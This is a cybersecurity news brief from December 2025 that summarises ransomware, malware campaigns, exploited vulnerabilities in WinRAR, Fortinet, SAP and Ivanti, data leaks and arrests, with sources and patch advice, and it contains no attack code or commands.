Svoboda Cybersecurity Brief December 11, 2025

Akira Ransomware Group Extorts $250 Million in Payouts

The Akira ransomware group, linked to the Conti cybercrime gang, has demanded $250 million in ransom payments primarily from small and mid-sized organizations across manufacturing, education, IT, and healthcare sectors. Exploits VPNs/remote access tools, stealing data within 2 hours of infiltration.
Source: DataBreaches

Ukrainian Hacker Charged for Aiding Russian Hacktivist Groups

Victoria Dubranova, a Ukrainian national, was indicted for aiding Russian state-backed groups CyberArmyofRussia_Reborn (CARR) and NoName057(16) in attacks on US critical infrastructure, including water systems and election infrastructure. Faces up to 27 years if convicted.
Source: SecurityWeek

WinRAR Path Traversal Flaw (CVE-2025-6218) Actively Exploited

CISA added CVE-2025-6218 to its KEV catalog due to exploitation by groups like Bitter APT and Gamaredon. Attackers place files in Windows Startup folder for persistent code execution. Patched in WinRAR 7.12.
Impact: Local code execution via malicious archives.
Mitigation: Update to WinRAR 7.12+.
Source: The Hacker News

Google Ads Distribute macOS Infostealer via Fake AI Guides

Malicious Google ads redirect users to ChatGPT/Grok chats hosting AMOS infostealer scripts. Exploits macOS Terminal commands to steal crypto wallets, browser data, and credentials. Persists via LaunchDaemon.
Source: BleepingComputer

DroidLock Android Ransomware Locks Devices for Extortion

New DroidLock malware targets Spanish-speaking users via fake apps, locking screens and demanding ransom. Abuses Device Admin permissions to wipe data, change PINs, and steal lock patterns via overlay attacks.
Source: BleepingComputer

Fortinet Patches Critical SAML Auth Bypass (CVE-2025-59718/9)

FortiOS, FortiProxy, and FortiWeb vulnerable to SAML signature spoofing, allowing unauth access if FortiCloud SSO is enabled. Disabling SSO is a temporary workaround.
Impact: Full system compromise.
Mitigation: Disable FortiCloud SSO or update to fixed versions.
Source: SecurityWeek

React2Shell Exploits RSC Flaw to Deploy Linux Malware

Attackers exploit CVE-2025-55182 (RSC vulnerability) to deliver PeerBlight backdoor, CowTunnel proxy, and ZinFoq implant. Targets construction/entertainment sectors via automated tooling.
Source: The Hacker News

10,000 Docker Hub Images Expose Credentials and API Keys

Flare found 10,456 images leaking secrets, including 4,000 AI model keys (OpenAI, HuggingFace) and cloud credentials. 42% exposed ≥5 sensitive values.
Source: BleepingComputer

SAP Fixes Critical Code Injection in Solution Manager

CVE-2025-42880 (CVSS 9.9) allows authenticated attackers to execute arbitrary code in SAP Solution Manager. Critical due to its central role in enterprise environments.
Impact: Full system takeover.
Mitigation: Apply SAP patches ASAP.
Source: SecurityWeek

Ivanti EPM Vulnerabilities Allow RCE via XSS (CVE-2025-10573)

Critical stored XSS flaw in Ivanti EPM lets attackers hijack admin sessions via crafted device scan data. Three high-severity RCE flaws also patched.
Impact: Unauthenticated RCE.
Mitigation: Update to 2024 SU4 SR1.
Source: SecurityWeek

Teen Arrested for Stealing 64M Records from Spanish Firms

A 19-year-old in Spain stole DNI numbers, IBAN codes, and addresses from 9 companies, selling data on hacker forums. Used 6 accounts and 5 pseudonyms for distribution.
Source: DataBreaches

PCIe IDE Flaws (CVE-2025-9612/3/4) Affect Intel/AMD CPUs

Three low-severity flaws in PCIe 6.0 IDE protocol could allow data corruption or DoS via physical access. Intel Xeon 6/AMD EPYC 9005 processors confirmed affected.
Impact: Stale data consumption.
Mitigation: Apply firmware updates.
Source: The Hacker News

Microsoft Teams to Flag Suspicious External Domain Traffic

New External Domains Anomalies Report detects spikes in messaging with untrusted domains, aiding in phishing/data exfiltration prevention. Rolls out Feb 2026.
Source: BleepingComputer

Spiderman Phishing Kit Targets European Banks

Modular kit creates pixel-perfect clones of Deutsche Bank, ING, and PayPal to steal PhotoTAN/OTP codes. Linked to 750-member Signal group.
Source: BleepingComputer

Hidden Metadata Exposes UK Hospital Staff Absence Data

Royal Cornwall Hospital accidentally published hidden columns in a FOI response spreadsheet, revealing 8,100 staff absences over 3 years.
Source: DataBreaches

Share this brief: https://svo.bz/tpAc